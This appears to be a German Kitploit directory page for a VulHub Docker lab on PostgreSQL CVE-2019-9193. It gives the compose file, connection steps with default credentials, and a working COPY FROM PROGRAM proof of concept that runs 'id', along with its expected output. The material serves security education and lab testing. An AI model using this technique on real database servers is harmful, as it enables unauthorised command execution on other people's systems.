Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-9193byVulHub — Docker-basiertes Labor, das die PostgreSQL-Befehlsausführung CVE-2019-9193 via COPY FROM PROGRAM demonstriert, mit Schritt-für-Schritt-PoC für Sicherheitstests und Bildung. | Kitploit
Tools/GitHubGitHub/corsisechero/cve-2019-9193byvulhub
SchwachstellenanalyseExploitationPenetrationstestsLernen & BildungDatenbanksicherheitLabs & Praxis
GitHubcorsisechero/cve-2019-9193byvulhub

CVE-2019-9193byVulHub

Docker-basiertes Labor, das die PostgreSQL-Befehlsausführung CVE-2019-9193 via COPY FROM PROGRAM demonstriert, mit Schritt-für-Schritt-PoC für Sicherheitstests und Bildung.

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-9193byVulHub


PostgreSQL: Beliebige Befehlsausführung mit Administratorrechten (CVE-2019-9193)

Beschreibung

PostgreSQL ist ein leistungsstarkes, quelloffenes relationales Datenbankverwaltungssystem. Eine in den Versionen 9.3 bis 11 vorhandene Schwachstelle ermöglicht Administratoren oder Benutzern mit den COPY TO/FROM PROGRAM-Berechtigungen, beliebige Befehle auf dem System auszuführen.

Referenzen:

  • GitHub – Vulhub – PostgreSQL CVE-2019-9193
  • Greenwolf Security – Authentifizierte beliebige Befehlsausführung auf PostgreSQL 9.3 – Neueste

Umgebungskonfiguration

Docker Compose-Datei ()

docker-compose.yml

Erstelle eine Datei docker-compose.yml mit folgendem Inhalt:

root@kitploit:~
version: '2'
services:
 postgres:
   image: vulhub/postgres:10.7
   ports:
    - "5432:5432"
   environment:
    - POSTGRES_PASSWORD=postgres

Starten des PostgreSQL-Containers

Führe den Container mit folgendem Befehl aus:

root@kitploit:~
docker compose up -d

Überprüfe, dass der Container läuft:

root@kitploit:~
docker ps

Die Ausgabe sollte den PostgreSQL-Container zeigen, der auf Port 5432 lauscht.


Ausführen des Exploits ohne Betreten des Containers

1. Installation des PostgreSQL-Clients

Wenn du den Client psql nicht installiert hast, kannst du ihn so installieren:

  • Kali:
    root@kitploit:~
    apt-get install postgresql-client
    

2. Verbindung zur Datenbank über die Befehlszeile

Verbinde dich direkt von Kali aus mit der Datenbank:

root@kitploit:~
psql -h localhost -p 5432 -U postgres

Du wirst nach dem Passwort gefragt, gib ein:

root@kitploit:~
postgres

3. Ausführung des PoC (Proof of Concept)

Sobald du mit der PostgreSQL-Konsole verbunden bist, führe die folgenden Befehle aus, um die Schwachstelle auszunutzen:

root@kitploit:~
-- Elimina la tabella se esiste
DROP TABLE IF EXISTS cmd_exec;

-- Crea una nuova tabella per memorizzare l'output del comando
CREATE TABLE cmd_exec(cmd_output text);

-- Esegui il comando 'id' tramite la funzione COPY FROM PROGRAM
COPY cmd_exec FROM PROGRAM 'id';

-- Visualizza l'output del comando
SELECT * FROM cmd_exec;

4. Befehlsausführung über die Befehlszeile (ohne interaktive Shell)

Du kannst alles direkt über die Befehlszeile ausführen:

root@kitploit:~
psql -h localhost -p 5432 -U postgres -c "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;"

Überprüfung der Ausgabe

Wenn der Exploit erfolgreich war, solltest du eine ähnliche Ausgabe sehen:

root@kitploit:~
       cmd_output
-------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres)
(1 row)

Verlassen der PostgreSQL-Konsole

Drücke \q zum Verlassen:

root@kitploit:~
\q

Sicherheitshinweise

Diese Schwachstelle ermöglicht die beliebige Ausführung von Befehlen mit Administratorrechten. Verwende sie nur in kontrollierten Umgebungen und zu Studien- oder Überprüfungszwecken. Die Ausnutzung dieser Schwachstelle auf nicht autorisierten Systemen ist illegal.

Tool herunterladen